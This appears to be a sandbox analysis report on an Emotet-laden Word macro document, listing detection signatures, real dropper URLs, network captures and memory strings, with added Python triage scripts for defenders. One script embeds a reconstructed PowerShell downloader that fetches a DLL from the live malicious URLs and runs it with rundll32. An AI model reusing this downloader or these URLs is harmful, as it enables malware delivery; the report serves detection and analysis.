Analysis Report N00048481397007.doc

Overview

General Information

Sample Name: N00048481397007.doc
Analysis ID: 344134
MD5: ad7db0f946bc5c3bb051cb04f359e6a4
SHA1: 24d54a6a1c4280b948fb245c97e4823d319eefe1
SHA256: 4fc6cbe4fae599ca6ab094dc1115909a687754f49a3ff31671ae4fbc7b3296d1

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
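The encoded PowerShell, WMI process creation and rundll32 ordinal signatures above are straightforward to re-check from process-creation telemetry. The following is an added example written for this page, not code from Joe Sandbox or from the sample: it decodes a -EncodedCommand payload (base64 over UTF-16LE), extracts the '!'-separated download list from it, and flags the parent/child and command-line patterns. The process events are constructed; the URL list reuses the three entries recovered from PowerShell memory in this report, but the script wrapped around it is a stand-in, not the sample's real payload, and the 1000-character "very long command line" threshold is an assumption.

```python
"""Added triage example (not from the Joe Sandbox report): decode a PowerShell
-EncodedCommand payload, pull the '!'-separated download list out of it, and
flag the WMI-spawned / encoded / ordinal-call patterns the signatures describe.
All sample events are constructed; the script body only mimics the list shape."""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass, field

# Finding labels (constants so callers can test for them by name).
F_WMI_PARENT = "process created via WMI (parent is WmiPrvSE.exe)"
F_OFFICE_PARENT = "script host spawned directly by an Office application"
F_ENCODED = "encoded PowerShell command line"
F_VERY_LONG = "very long command line"
F_ORDINAL = "rundll32 export called by ordinal"

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "rundll32.exe", "mshta.exe"}
VERY_LONG = 1000  # assumed threshold; the report does not state Joe Sandbox's
# A URL stops at whitespace, quotes, and the '!' / '@' list delimiters.
URL_RE = re.compile(r"https?://[^\s'\"!@<>;,()]+")
ORDINAL_RE = re.compile(r",\s*#\d+\b")


@dataclass(frozen=True)
class ProcessEvent:
    image: str
    parent_image: str
    cmdline: str


@dataclass
class Triage:
    findings: list[str] = field(default_factory=list)
    urls: list[str] = field(default_factory=list)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the script hidden behind -EncodedCommand, or None.
    PowerShell accepts any unambiguous prefix of the switch (-e, -ec, -enc, ...);
    the argument is base64 over UTF-16LE text."""
    tokens = cmdline.split()
    for flag, payload in zip(tokens, tokens[1:]):
        name = flag.lower().lstrip("-/")
        if flag[0] in "-/" and name and "encodedcommand".startswith(name):
            try:
                return base64.b64decode(payload, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def triage_event(ev: ProcessEvent) -> Triage:
    """Apply the process-side checks to one process-creation event."""
    out = Triage()
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    if image in SCRIPT_HOSTS:
        if parent == "wmiprvse.exe":   # Win32_Process.Create breaks the Office parent chain
            out.findings.append(F_WMI_PARENT)
        elif parent in OFFICE_APPS:
            out.findings.append(F_OFFICE_PARENT)
    if len(ev.cmdline) > VERY_LONG:
        out.findings.append(F_VERY_LONG)
    if image == "powershell.exe":
        script = decode_encoded_command(ev.cmdline)
        if script is not None:
            out.findings.append(F_ENCODED)
            out.urls = URL_RE.findall(script)
    if image == "rundll32.exe" and ORDINAL_RE.search(ev.cmdline):
        out.findings.append(F_ORDINAL)
    return out


# Constructed sample. The URL list mirrors the entries the report recovered from
# PowerShell memory; the surrounding script is a stand-in, not the real payload.
SAMPLE_URL_LIST = ("http://nightlifemumbai.club/x/0wBD3/!"
                   "https://shop.nowfal.dev/wp-includes/RlMObf2j0/!"
                   "http://e-wdesign.eu/wp-content/bn1IgDejh/")


def make_sample_events() -> list[ProcessEvent]:
    script = ("$p=$env:TEMP+'\\x.dll';"
              f"foreach($u in '{SAMPLE_URL_LIST}'.Split('!')){{"
              "try{(New-Object Net.WebClient).DownloadFile($u,$p);break}catch{}}")
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return [
        ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                     r"C:\Windows\System32\wbem\WmiPrvSE.exe",
                     f"powershell -w hidden -enc {b64}"),
        ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                     r"rundll32.exe C:\Users\user\AppData\Local\Temp\x.dll,#1"),  # constructed path
        ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                     r"C:\Windows\explorer.exe",
                     "powershell -NoProfile -Command Get-Date"),  # benign control
    ]


if __name__ == "__main__":
    for ev in make_sample_events():
        t = triage_event(ev)
        print(_basename(ev.image), t.findings, t.urls)
```

Running it prints one line per event. The decoder deliberately stops at the first plausible switch and does not undo string concatenation or the GOTO-style VBA obfuscation noted above; the recovered script is what a Sigma "Suspicious Encoded PowerShell Command Line" hit should be enriched with, and the extracted list is what feeds the dropper-URL signature.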

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://nightlifemumbai.club/x/0wBD3/ Avira URL Cloud: Label: malware
Source: https://shop.nowfal.dev/wp-includes/RlMObf2j0/ Avira URL Cloud: Label: malware
Source: https://jflmktg.wpcomstaging.com/wp-content/AK/ Avira URL Cloud: Label: malware
Source: https://shop.nowfal.dev Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: shop.nowfal.dev Virustotal: Detection: 7%
Source: e-wdesign.eu Virustotal: Detection: 5%
Multi AV Scanner detection for submitted file
Source: N00048481397007.doc Virustotal: Detection: 16%

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown HTTPS traffic detected: 212.227.200.73:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown HTTPS traffic detected: 192.0.78.20:443 -> 192.168.2.22:49170 version: TLS 1.0
Uses new MSVCR DLLs
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2087459336.0000000002290000.00000002.00000001.sdmp
Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: nightlifemumbai.club
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.88.166:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.217.6.174:80

Networking:

Potential dropper URLs found in powershell memory (of the matches below, only the '!'-separated list from the 0x3A85000 dump is the dropper URL list; the other hits are Windows resource strings for Windows Media Player, Ease of Access and activation help links, and are not indicators)
Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp String found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp String found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp String found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp String found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp String found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp String found in memory: Do you want to switch to it now?
Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp String found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA
Source: powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmp String found in memory: http://nightlifemumbai.club/x/0wBD3/!https://shop.nowfal.dev/wp-includes/RlMObf2j0/!http://e-wdesign.eu/wp-content/bn1IgDejh/!http://traumfrauen-ukraine.de/bin/JyeS/!https://jflmktg.wpcomstaging.com/wp-content/AK/!https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp String found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp String found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/bn1IgDejh/ HTTP/1.1Host: e-wdesign.euConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bin/JyeS/ HTTP/1.1Host: traumfrauen-ukraine.deConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 212.227.200.73
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: AUTOMATTICUS
Source: Joe Sandbox View ASN Name: M247GB
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown HTTPS traffic detected: 212.227.200.73:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown HTTPS traffic detected: 192.0.78.20:443 -> 192.168.2.22:49170 version: TLS 1.0
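Both the "HTTP GET or POST without a user agent" entries and the "Uses insecure TLS / SSL version" entries above can be re-derived from the raw evidence. The block below is an added example for this page, not Joe Sandbox code: it parses HTTP requests, flagging GET/POST with no User-Agent header and rebuilding the request URL from Host and path, and parses "HTTPS traffic detected ... version:" lines, reporting anything older than TLS 1.2. The sample requests are the three GETs from this report with their CRLFs restored plus one benign control; the TLS lines are the three from this report plus a TLS 1.2 control on a documentation-range address; the http:// scheme is assumed for the plaintext requests.

```python
"""Added example (not part of the report): re-check the no-User-Agent and
weak-TLS network signatures on raw evidence. Sample inputs are constructed
from the report's evidence lines with CRLFs restored, plus benign controls."""
from __future__ import annotations

import re
from dataclasses import dataclass

WEAK_TLS = {"SSLv2", "SSLv3", "TLS 1.0", "TLS 1.1"}
# Matches the sandbox's "ip:port -> ip:port version: TLS x.y" evidence format.
TLS_LINE_RE = re.compile(
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3}):(?P<sport>\d+)\s*->\s*"
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3}):(?P<dport>\d+)\s+version:\s*"
    r"(?P<ver>SSLv\d|TLS \d\.\d)")


@dataclass(frozen=True)
class HttpRequest:
    method: str
    target: str
    version: str
    headers: dict  # header names lower-cased


def parse_http_request(raw: bytes) -> HttpRequest:
    """Parse the request line and headers of one raw HTTP/1.x request."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, version, headers)


def check_request(raw: bytes, scheme: str = "http") -> tuple[str, list[str]]:
    """Return (url, findings). The scheme is supplied by the caller because the
    request bytes do not say whether they travelled over TLS."""
    req = parse_http_request(raw)
    url = f"{scheme}://{req.headers.get('host', '?')}{req.target}"
    findings = []
    if req.method in ("GET", "POST") and "user-agent" not in req.headers:
        findings.append(f"HTTP {req.method} without a User-Agent header")
    return url, findings


def check_tls_line(line: str) -> tuple[str, str, str] | None:
    """Return (first endpoint, second endpoint, version) for a pre-TLS-1.2 session.
    The report writes these lines as server -> client."""
    m = TLS_LINE_RE.search(line)
    if m and m.group("ver") in WEAK_TLS:
        return m.group("src"), m.group("dst"), m.group("ver")
    return None


# Constructed from the report's evidence lines; the last request and the last
# TLS line are benign controls (documentation-range address, no real host).
SAMPLE_REQUESTS = [
    b"GET /x/0wBD3/ HTTP/1.1\r\nHost: nightlifemumbai.club\r\nConnection: Keep-Alive\r\n\r\n",
    b"GET /wp-content/bn1IgDejh/ HTTP/1.1\r\nHost: e-wdesign.eu\r\nConnection: Keep-Alive\r\n\r\n",
    b"GET /bin/JyeS/ HTTP/1.1\r\nHost: traumfrauen-ukraine.de\r\nConnection: Keep-Alive\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
]
SAMPLE_TLS_LINES = [
    "104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0",
    "212.227.200.73:443 -> 192.168.2.22:49169 version: TLS 1.0",
    "192.0.78.20:443 -> 192.168.2.22:49170 version: TLS 1.0",
    "203.0.113.10:443 -> 192.168.2.22:49171 version: TLS 1.2",
]


def run(requests=SAMPLE_REQUESTS, tls_lines=SAMPLE_TLS_LINES) -> dict:
    """Return the URLs requested without a User-Agent and the weak TLS sessions."""
    flagged_urls = [url for url, findings in map(check_request, requests) if findings]
    weak = [hit for hit in map(check_tls_line, tls_lines) if hit]
    return {"no_user_agent": flagged_urls, "weak_tls": weak}


if __name__ == "__main__":
    for key, values in run().items():
        print(key)
        for v in values:
            print("  ", v)
```

A default .NET WebClient or HttpWebRequest sends no User-Agent unless the caller sets one, so the missing header is consistent with a PowerShell downloader but is not specific to Emotet; treat it as a corroborating signal next to the WMI-spawned PowerShell rather than a standalone detection. The TLS 1.0 sessions are a compliance finding and say nothing about the payload on their own.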
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5018462-B174-499E-B3BD-E7523F18DF93}.tmp
Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091212034.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088276083.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000005.00000002.2093071337.000000001B590000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: nightlifemumbai.club
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found  Content-Type: text/html; charset=UTF-8  Referrer-Policy: no-referrer  Content-Length: 1569  Date: Tue, 26 Jan 2021 05:54:56 GMT  Data Raw (hex in the source, decoded here; the stock Google "Error 404 (Not Found)!!1" page, dump truncated): <!DOCTYPE html> <html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) ...
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
Source: powershell.exe, 00000005.00000002.2093133348.000000001B612000.00000004.00000001.sdmp String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000005.00000002.2093071337.000000001B590000.00000004.00000001.sdmp String found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: powershell.exe, 00000005.00000002.2095948799.000000001D2B4000.00000004.00000001.sdmp String found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/EncryptionEverywhereDVTLSCA-G1.crt0
Source: powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmp String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000005.00000003.2086123235.000000001D35B000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000005.00000003.2086513222.000000001B657000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmp String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmp String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: powershell.exe, 00000005.00000003.2086200041.000000001D303000.00000004.00000001.sdmp String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmp String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0L
Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: powershell.exe, 00000005.00000002.2086940849.0000000000391000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: powershell.exe, 00000005.00000002.2093133348.000000001B612000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2096359937.000000001D337000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000005.00000002.2093071337.000000001B590000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab;
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp String found in binary or memory: http://e-wdesign.eu
Source: powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmp String found in binary or memory: http://e-wdesign.eu/wp-content/bn1IgDejh/
Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
